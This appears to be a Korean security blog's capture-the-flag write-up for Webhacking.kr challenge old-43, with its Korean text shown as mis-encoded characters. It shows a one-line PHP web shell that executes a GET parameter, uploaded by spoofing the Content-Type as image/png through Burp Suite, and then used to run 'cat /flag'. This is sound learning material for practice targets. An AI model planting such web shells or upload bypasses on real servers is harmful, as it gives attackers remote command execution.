ABOUT ME

-

Today
-
Yesterday
-
Total
-
  • Webhacking.kr :: old-43๋ฒˆ
    SECURITY/Webhacking 2021. 2. 17. 17:37

    ์—ฌ๊ธฐ์„œ ๊ทธ๋ƒฅ ์ œ์ถœ์„ ๋ˆŒ๋Ÿฌ๋ณด๋ฉด

     

     

    type not detected ๊ฐ€ ๋œฌ๋‹ค.

     

    ๊ฐ„๋‹จํ•œ tmp.txt ํŒŒ์ผ์„ ์ œ์ถœํ•˜๋ฉด,

    Type ์ด ์˜ณ์ง€ ์•Š๋‹ค๊ณ  ํ•œ๋‹ค.

    ๊ทธ๋ž˜์„œ ์ด๋ฏธ์ง€๋ฅผ ํ•˜๋‚˜ ์˜ฌ๋ ธ๋”๋‹ˆ Done! ์ด๋ผ๊ณ  ๋œฌ๋‹ค.

     

     

    webshell ์„ ์—…๋กœ๋“œ ํ•˜๋ผ๊ณ  ๋˜์–ด์žˆ์ง€๋งŒ, txt ๊ธฐ๋ฐ˜์˜ ํŒŒ์ผ๋“ค์€ ํ•„ํ„ฐ๋งํ•˜๋Š” ๊ฒƒ ๊ฐ™๋‹ค. (php ๋Š” ๋ฌผ๋ก  ์•ˆ๋จ)

     

    ํ”„๋ก์‹œ๋ฅผ ์จ์„œ php ๋ฅผ ์—…๋กœ๋“œํ•˜๋˜, img ๋ผ๊ณ  ์ธ์‹ํ•˜๋„๋ก ๋งŒ๋“ค์ž.

    (Burp Suite ์‚ฌ์šฉ๋ฒ• ์ฐธ์กฐ - 2021/02/17 - [SECURITY/Webhacking] - Burp Suite ์„ค์น˜ ๋ฐ ์‚ฌ์šฉ - Windows 64 bit)

     

    ์—…๋กœ๋“œํ•  php ์˜ ์ฝ”๋“œ๋Š” ๋‹ค์Œ๊ณผ ๊ฐ™๋‹ค.

    <?php
    	system($_GET[cmd]);
    ?>

    cmd ๋ฅผ GET ์œผ๋กœ ๊ฐ€์ ธ์™€์„œ ์‹คํ–‰์‹œํ‚ค๋Š” ์ฝ”๋“œ์ด๋‹ค.

    ์—ฌ๊ธฐ์„œ cmd ์— cat /flag ๋ฅผ ํ•˜๋ฉด ์›น์‰˜์—์„œ cat /flag ๋ฅผ ํ†ตํ•ด flag ๊ฐ’์„ ๋ณด์—ฌ์ค„ ๊ฒƒ์ด๋‹ค.

     

    ์ œ์ถœ์„ ๋ˆ„๋ฅธ ๋’ค, ์ œ์ถœ์— ๋Œ€ํ•œ Request ๋ฅผ ํ”„๋ก์‹œ๋กœ ๋ณ€์กฐํ•œ๋‹ค.

    Content-Type ์„ image/png ๋ผ๊ณ  ํ•˜๊ณ , ์›ํ•˜๋Š” php ์ฝ”๋“œ๋ฅผ ๋„ฃ์–ด์ค€๋‹ค.

     

     

    a.php ์ด์ง€๋งŒ ์ž˜ ์—…๋กœ๋“œ๊ฐ€ ๋˜์—ˆ๊ณ , (Type ์„ ์†์˜€์œผ๋‹ˆ)

    ์ € ./upload/a.php ๋ฅผ ๋ˆŒ๋Ÿฌ๋ณด๋ฉด ์—…๋กœ๋“œํ•œ ํŒŒ์ผ์„ ๋ณผ ์ˆ˜ ์žˆ๋‹ค.

     

     

    ๊ทธ๋ƒฅ ๋ˆŒ๋Ÿฌ๋ณด๋ฉด ์•„๋ฌด๊ฒƒ๋„ ์•ˆ๋œจ์ง€๋งŒ, (cmd ์— ์•„๋ฌด๋Ÿฐ ๋‚ด์šฉ์ด ์—†์–ด์„œ)

    url ์— cmd=cat /flag ๋ผ๊ณ  ํ•˜๋ฉด, FLAG ๊ฐ’์ด ๋‚˜์˜จ๋‹ค. 

     

    ์ด๊ฑธ Auth ์— ๋„ฃ์–ด์ฃผ๋ฉด ๋!

     

     

     

     

    + ๋ฒˆ์™ธ

     

    FLAG ๊ฐ€ base64 ๋กœ ์ธ์ฝ”๋”ฉ๋œ ๊ฑฐ๋ผ ๊ถ๊ธˆํ•ด์„œ ๋””์ฝ”๋”ฉ ํ•ด๋ดค๋”๋‹ˆ ๋‹ค์Œ๊ณผ ๊ฐ™์ด ๋‚˜์™”๋‹ค.

    Auth ์—๋Š” ๊ทธ๋ƒฅ base64 ๋กœ ์ธ์ฝ”๋”ฉ๋œ ๊ฒƒ ๊ทธ๋Œ€๋กœ ๋„ฃ์–ด์ฃผ๋ฉด ๋˜์ง€๋งŒ ์žฌ๋ฐŒ๋Š” ์žฅ์น˜๋ฅผ ํ•ด๋†จ๋‹ค๋Š” ์ƒ๊ฐ์ด ๋“ค์—ˆ๋‹ค.

     

     

     

    Ref.

    [1] webshell code1018.tistory.com/96

    .

    'SECURITY > Webhacking' ์นดํ…Œ๊ณ ๋ฆฌ์˜ ๋‹ค๋ฅธ ๊ธ€

    Proxy ํ”„๋ก์‹œ๋ž€?  (0) 2021.02.17
    Webhacking.kr :: old-41๋ฒˆ  (0) 2021.02.17
    Burp Suite ์„ค์น˜ ๋ฐ ์‚ฌ์šฉ - Windows 64 bit  (0) 2021.02.17
    Webhacking.kr :: old-12๋ฒˆ  (0) 2021.02.16
    Webhacking.kr :: old-59๋ฒˆ  (0) 2021.02.16

    ๋Œ“๊ธ€

Designed by Tistory.